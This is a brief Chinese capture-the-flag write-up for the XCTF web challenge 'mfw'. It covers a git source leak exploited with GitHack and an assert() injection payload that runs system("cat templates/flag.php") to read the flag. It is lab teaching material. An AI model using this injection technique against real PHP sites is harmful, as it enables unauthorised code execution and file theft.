攻防世界web高手进阶18（mfw）

打开题目先收集有用的信息

是用了Git、PHP、Bootstrap，尝试是否有git源码泄露

有git源码泄露漏洞，直接上工具扒。
工具下载命令（Linux）

git clone https://github.com/lijiejie/GitHack.git

直接查看flag.php没有数据信息

查看一下index.php

strpos()函数会匹配第一个参数与另一个参数匹配，如果一样则为false，然后就会。。。。

所以用工具爬是个不错的选择

file_exists() 函数检查文件或目录是否存在
assert()函数会将括号中的字符当成代码来执行
所以可以尝试从assert()函数入手，构建pyload

') or system("cat templates/flag.php");//

带入代码中为：

assert("file_exists('') or system("cat templates/flag.php");//')") or die("That file doesn't exist!");

其 中//起到的是注释后面代码的作用

没得回显，查看下源代码